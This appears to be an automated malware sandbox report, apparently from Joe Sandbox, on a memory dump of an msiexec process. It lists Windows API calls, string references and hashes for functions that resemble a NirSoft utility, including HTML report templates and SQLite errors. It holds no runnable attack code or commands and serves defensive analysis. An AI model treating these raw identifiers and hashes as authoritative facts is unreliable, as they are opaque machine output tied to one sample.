                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memset$_snwprintf
                                                                                • String ID: %%0.%df
                                                                                • API String ID: 3473751417-763548558
                                                                                • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                APIs
                                                                                • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                • GetTickCount.KERNEL32 ref: 0040610B
                                                                                • GetParent.USER32(?), ref: 00406136
                                                                                • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                • String ID: A
                                                                                • API String ID: 2892645895-3554254475
                                                                                • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                APIs
                                                                                • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                  • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                  • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                  • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                  • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                • memset.MSVCRT ref: 0040DA23
                                                                                • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                  • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                • String ID: caption
                                                                                • API String ID: 973020956-4135340389
                                                                                • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                APIs
                                                                                Strings
                                                                                • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memset$_snwprintf$wcscpy
                                                                                • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                • API String ID: 1283228442-2366825230
                                                                                • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                                APIs
                                                                                • wcschr.MSVCRT ref: 00413972
                                                                                • wcscpy.MSVCRT ref: 00413982
                                                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                  • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                • wcscpy.MSVCRT ref: 004139D1
                                                                                • wcscat.MSVCRT ref: 004139DC
                                                                                • memset.MSVCRT ref: 004139B8
                                                                                  • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                  • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                • memset.MSVCRT ref: 00413A00
                                                                                • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                                • wcscat.MSVCRT ref: 00413A27
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                • String ID: \systemroot
                                                                                • API String ID: 4173585201-1821301763
                                                                                • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: wcscpy
                                                                                • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                • API String ID: 1284135714-318151290
                                                                                • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                                • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                                APIs
                                                                                  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                  • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                  • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                • strchr.MSVCRT ref: 0040C140
                                                                                • strchr.MSVCRT ref: 0040C151
                                                                                • _strlwr.MSVCRT ref: 0040C15F
                                                                                • memset.MSVCRT ref: 0040C17A
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
                                                                                • String ID: 4$h
                                                                                • API String ID: 4019544885-1856150674
                                                                                • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                • String ID: 0$6
                                                                                • API String ID: 4066108131-3849865405
                                                                                • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                APIs
                                                                                • memset.MSVCRT ref: 004082EF
                                                                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                • memset.MSVCRT ref: 00408362
                                                                                • memset.MSVCRT ref: 00408377
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memset$ByteCharMultiWide
                                                                                • String ID:
                                                                                • API String ID: 290601579-0
                                                                                • Opcode ID: c60d666c950e1de6cba0954a24524a9e41ca0abebb320c38a87f7a6f74f5840a
                                                                                • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                • Opcode Fuzzy Hash: c60d666c950e1de6cba0954a24524a9e41ca0abebb320c38a87f7a6f74f5840a
                                                                                • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                APIs
                                                                                • memchr.MSVCRT ref: 00444EBF
                                                                                • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                                                • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                                                • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                                                • memset.MSVCRT ref: 0044505E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$memchrmemset
                                                                                • String ID: PD$PD
                                                                                • API String ID: 1581201632-2312785699
                                                                                • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                                • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                                APIs
                                                                                • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                • GetDC.USER32(00000000), ref: 00409F6E
                                                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                • GetParent.USER32(?), ref: 00409FA5
                                                                                • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                • String ID:
                                                                                • API String ID: 2163313125-0
                                                                                • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                                • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: free$wcslen
                                                                                • String ID:
                                                                                • API String ID: 3592753638-3916222277
                                                                                • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                                • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                                • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040A47B
                                                                                • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                • wcslen.MSVCRT ref: 0040A4BA
                                                                                • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                • wcslen.MSVCRT ref: 0040A4E0
                                                                                • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memcpywcslen$_snwprintfmemset
                                                                                • String ID: %s (%s)$YV@
                                                                                • API String ID: 3979103747-598926743
                                                                                • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                APIs
                                                                                • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                                • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                • wcslen.MSVCRT ref: 0040A6B1
                                                                                • wcscpy.MSVCRT ref: 0040A6C1
                                                                                • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                • wcscpy.MSVCRT ref: 0040A6DB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                • String ID: Unknown Error$netmsg.dll
                                                                                • API String ID: 2767993716-572158859
                                                                                • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                APIs
                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                • wcscpy.MSVCRT ref: 0040DAFB
                                                                                • wcscpy.MSVCRT ref: 0040DB0B
                                                                                • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                  • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                • API String ID: 3176057301-2039793938
                                                                                • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                                APIs
                                                                                Strings
                                                                                • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                • unable to open database: %s, xrefs: 0042F84E
                                                                                • too many attached databases - max %d, xrefs: 0042F64D
                                                                                • out of memory, xrefs: 0042F865
                                                                                • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                • database is already attached, xrefs: 0042F721
                                                                                • database %s is already in use, xrefs: 0042F6C5
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memcpymemset
                                                                                • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                • API String ID: 1297977491-2001300268
                                                                                • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                APIs
                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EB3F
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,00000000), ref: 0040EB5B
                                                                                • memcpy.MSVCRT(?,0045A248,00000014), ref: 0040EB80
                                                                                • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014), ref: 0040EB94
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC17
                                                                                • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000), ref: 0040EC21
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC59
                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                • String ID: ($d
                                                                                • API String ID: 1140211610-1915259565
                                                                                • Opcode ID: 612b475aad9d1d38ee13413eb206fefa6c5bad09ba85bb1eafc4472043e484bf
                                                                                • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                                • Opcode Fuzzy Hash: 612b475aad9d1d38ee13413eb206fefa6c5bad09ba85bb1eafc4472043e484bf
                                                                                • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                                APIs
                                                                                • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                • GetLastError.KERNEL32 ref: 004178FB
                                                                                • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: File$ErrorLastLockSleepUnlock
                                                                                • String ID:
                                                                                • API String ID: 3015003838-0
                                                                                • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                APIs
                                                                                • memset.MSVCRT ref: 00407E44
                                                                                • memset.MSVCRT ref: 00407E5B
                                                                                • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                • wcscpy.MSVCRT ref: 00407F10
                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                • String ID:
                                                                                • API String ID: 59245283-0
                                                                                • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                                • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                                APIs
                                                                                • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                                                • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                                                • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
